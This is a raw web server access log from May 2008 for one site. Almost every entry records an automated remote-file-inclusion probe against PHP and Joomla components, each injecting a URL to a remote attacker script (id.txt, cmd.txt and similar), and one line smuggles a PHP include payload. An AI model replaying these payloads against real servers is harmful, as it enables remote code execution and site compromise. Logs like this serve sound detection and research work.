121.78.116.71 - - [16/May/2008:12:10:40 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:10:45 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:10:46 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:10:53 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:10:56 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:10:56 -0700] "GET /logs/access_080215.log/convert/mvcw.php?step=1&vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:10:59 -0700] "GET /logs//inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:11:00 -0700] "GET //inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:11:10 -0700] "GET /logs/access_080421.log//inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:11:10 -0700] "GET //inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:11:10 -0700] "GET /logs//inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:11:10 -0700] "GET /logs/access_071213.log//inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.90.111.159 - - [16/May/2008:12:11:16 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
66.90.111.159 - - [16/May/2008:12:11:16 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:11:19 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:11:29 -0700] "GET /logs/access_080421.log//inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:11:29 -0700] "GET //inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:11:30 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:11:30 -0700] "GET /logs//inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:11:30 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:11:30 -0700] "GET /logs/access_071213.log//inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:11:30 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
206.221.191.24 - - [16/May/2008:12:11:42 -0700] "GET /logs//orderSuccess.inc.php?glob=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [16/May/2008:12:11:47 -0700] "GET //orderSuccess.inc.php?glob=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.115.80.2 - - [16/May/2008:12:12:01 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
195.225.171.182 - - [16/May/2008:12:12:01 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.225.171.182 - - [16/May/2008:12:12:02 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.115.80.2 - - [16/May/2008:12:12:02 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
209.62.115.202 - - [16/May/2008:12:12:02 -0700] "GET /logs/access_080119.log/index.php?option=com_newsfeeds&mosConfig_absolute_path=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.62.115.202 - - [16/May/2008:12:12:08 -0700] "GET /index.php?option=com_newsfeeds&mosConfig_absolute_path=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
209.62.115.202 - - [16/May/2008:12:12:08 -0700] "GET /logs/index.php?option=com_newsfeeds&mosConfig_absolute_path=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:12:16 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:12:26 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:12:27 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.98 - - [16/May/2008:12:12:29 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.43 - - [16/May/2008:12:12:31 -0700] "GET /logs/access_080414.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.153.141.220 - - [16/May/2008:12:12:31 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [16/May/2008:12:12:35 -0700] "GET /logs/access_080221.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [16/May/2008:12:12:36 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [16/May/2008:12:12:36 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.153.141.220 - - [16/May/2008:12:12:37 -0700] "GET /logs//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 200 47704 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:12:40 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.153.141.220 - - [16/May/2008:12:12:40 -0700] "GET //?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:12:41 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:12:42 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [16/May/2008:12:13:04 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://83.222.131.90/~legitimi/mybase/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
209.62.115.202 - - [16/May/2008:12:13:04 -0700] "GET /logs/access_080127.log/index.php?option=com_newsfeeds&mosConfig_absolute_path=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:12:13:09 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:12:13:09 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:12:13:10 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.149.226.176 - - [16/May/2008:12:13:12 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.66.83 - - [16/May/2008:12:13:20 -0700] "GET /logs/access_080220.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.178.176.36 - - [16/May/2008:12:13:32 -0700] "GET /logs/access_080221.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fahrschule-duenhoeft.de/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.178.176.36 - - [16/May/2008:12:13:33 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fahrschule-duenhoeft.de/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.178.176.36 - - [16/May/2008:12:13:35 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fahrschule-duenhoeft.de/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
58.26.137.64 - - [16/May/2008:12:13:41 -0700] "GET /logs//popup_window.php?site_isp_root=http://83.222.131.90/~legitimi/mybase/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [16/May/2008:12:13:41 -0700] "GET //popup_window.php?site_isp_root=http://83.222.131.90/~legitimi/mybase/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:12:13:43 -0700] "GET /logs/access_080131.log/convert/mvcw.php?step=1&vwar_root=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:13:54 -0700] "GET /index.php?redir=http://raybrothers.org/images/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:13:58 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.178.176.36 - - [16/May/2008:12:14:06 -0700] "GET /logs/access_080221.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fahrschule-duenhoeft.de/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.178.176.36 - - [16/May/2008:12:14:08 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fahrschule-duenhoeft.de/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.221.191.24 - - [16/May/2008:12:14:08 -0700] "GET /logs/access_080209.log//orderSuccess.inc.php?glob=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.178.176.36 - - [16/May/2008:12:14:09 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fahrschule-duenhoeft.de/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:12:14:09 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:12:14:09 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:12:14:10 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.6.180.69 - - [16/May/2008:12:14:12 -0700] "GET /logs/access_080201.log/index.php?pagina=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.221.191.24 - - [16/May/2008:12:14:13 -0700] "GET //orderSuccess.inc.php?glob=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.217.194 - - [16/May/2008:12:14:17 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.217.194 - - [16/May/2008:12:14:17 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.6.180.69 - - [16/May/2008:12:14:18 -0700] "GET /logs/index.php?pagina=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.6.180.69 - - [16/May/2008:12:14:18 -0700] "GET /index.php?pagina=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
206.221.191.24 - - [16/May/2008:12:14:18 -0700] "GET /logs//orderSuccess.inc.php?glob=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.190.22.52 - - [16/May/2008:12:14:26 -0700] "GET /logs/access_080313.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://th3m3.awardspace.com/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:14:29 -0700] "GET /logs/access_080221.log//faqsupport/samplefaqsupport.php?path[docroot]=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:14:30 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.130.10 - - [16/May/2008:12:14:30 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://1nb0x.iespana.es/vai.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
211.239.130.10 - - [16/May/2008:12:14:30 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://1nb0x.iespana.es/vai.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:14:31 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.43 - - [16/May/2008:12:14:36 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:12:14:37 -0700] "GET /logs/access_080131.log/convert/mvcw.php?step=1&vwar_root=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.43 - - [16/May/2008:12:14:37 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.178.176.36 - - [16/May/2008:12:14:38 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fahrschule-duenhoeft.de/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.178.176.36 - - [16/May/2008:12:14:41 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fahrschule-duenhoeft.de/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:12:14:42 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:12:14:42 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:12:14:42 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.229.242 - - [16/May/2008:12:14:48 -0700] "GET //SQuery/lib/doom3.php?libpath=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.246.51.45 - - [16/May/2008:12:15:09 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [16/May/2008:12:15:10 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:15:12 -0700] "GET /logs/access_080124.log//faqsupport/samplefaqsupport.php?path[docroot]=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:15:28 -0700] "GET /logs/access_080221.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:15:28 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:15:28 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
119.63.193.186 - - [16/May/2008:12:15:39 -0700] "GET /retreat1/webcam/retreat1_00017.jpg HTTP/1.1" 200 44287 "-" "BaiduImagespider+(+http://www.baidu.jp/search/s308.html)" "www.dmulk.com"
89.108.66.83 - - [16/May/2008:12:15:41 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.tukangbecak.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [16/May/2008:12:15:41 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.tukangbecak.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.178.176.36 - - [16/May/2008:12:15:50 -0700] "GET /logs/access_080220.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fahrschule-duenhoeft.de/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:15:57 -0700] "GET /logs/access_080124.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
206.221.191.24 - - [16/May/2008:12:15:58 -0700] "GET /logs/access_080201.log//orderSuccess.inc.php?glob=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:16:03 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:12:16:03 -0700] "GET /logs//inc/download_center_lite.inc.php?script_root=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:16:03 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:12:16:09 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:12:16:14 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:12:16:14 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.34.226.62 - - [16/May/2008:12:16:18 -0700] "GET /logs/config.php?path_to_root=http://www.geocities.com/mrasafira/kasih.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [16/May/2008:12:16:19 -0700] "GET /config.php?path_to_root=http://www.geocities.com/mrasafira/kasih.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.178.176.36 - - [16/May/2008:12:16:30 -0700] "GET /logs/access_080220.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fahrschule-duenhoeft.de/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:16:33 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.6.34 - - [16/May/2008:12:16:38 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [16/May/2008:12:16:39 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:16:39 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://raybrothers.org/images/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [16/May/2008:12:17:04 -0700] "GET /logs//main.php?sayfa=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [16/May/2008:12:17:04 -0700] "GET //main.php?sayfa=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.72.88 - - [16/May/2008:12:17:06 -0700] "GET /logs//main.php?sayfa=http://welfare.skku.edu/bbs/files/id6.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.72.88 - - [16/May/2008:12:17:06 -0700] "GET //main.php?sayfa=http://welfare.skku.edu/bbs/files/id6.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [16/May/2008:12:17:17 -0700] "GET /logs/index1.php?menu=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [16/May/2008:12:17:17 -0700] "GET /logs/index1.php?menu=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
